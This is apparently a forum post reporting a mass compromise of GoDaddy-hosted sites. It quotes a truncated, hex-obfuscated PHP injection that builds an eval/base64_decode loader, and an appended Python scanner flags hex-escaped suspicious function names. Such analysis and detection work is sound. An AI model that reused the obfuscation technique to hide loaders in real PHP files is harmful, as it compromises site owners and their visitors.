by fseek 5712 days ago
Another one of those "mass" attacks on GoDaddy started today.

The blog doesn't give any numbers, but it seems that a few of their shared servers were compromised, so a few thousand sites at least.

One of my clients still hosts there and her files were all modified around 1pm today.

What I find unusual is the kind of code added to all PHP files:

" $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f.. \x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";.. $_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY.. "

If you decode that, it is an encoded "eval(base64_decode" to load the malware as hidden as possible.
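
An added example, not part of the original post: a Python scan that decodes PHP string literals written entirely as `\xNN` escapes and reports lines where they spell function names such as `create_function` or `base64_decode`, the pattern in the snippet quoted above. The sample input, its variable names and the `SUSPICIOUS` watch list are constructed for illustration.

```python
import re

# A PHP double-quoted string literal made up entirely of \xNN escapes.
HEX_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')

# Assumed watch list: names with no legitimate reason to be hex-escaped.
SUSPICIOUS = {"create_function", "base64_decode", "eval", "assert", "gzinflate"}


def decode_hex_literals(text):
    """Return the plain-text value of every all-hex string literal in text."""
    return [
        bytes.fromhex(m.group(1).replace("\\x", "")).decode("latin-1")
        for m in HEX_LITERAL.finditer(text)
    ]


def injected_lines(php_source):
    """Return (line_number, hidden_names) for lines hiding a watched name."""
    hits = []
    for number, line in enumerate(php_source.splitlines(), start=1):
        names = {s.lower() for s in decode_hex_literals(line)} & SUSPICIOUS
        if names:
            hits.append((number, sorted(names)))
    return hits


# Constructed sample: line 1 mimics the injected prefix with a placeholder
# payload, line 2 is ordinary code that merely contains one hex escape.
SAMPLE = "\n".join([
    r'<?php $_a="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";'
    r'$_b="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";'
    r'$_c=$_a("",$_b("PLACEHOLDER")); ?>',
    r'<?php echo "Hello \x41"; ?>',
])

if __name__ == "__main__":
    for number, names in injected_lines(SAMPLE):
        print(f"line {number}: hex-escaped {', '.join(names)}")
```

Only literals that consist of nothing but hex escapes are decoded, so ordinary strings that contain a single escaped character are not reported.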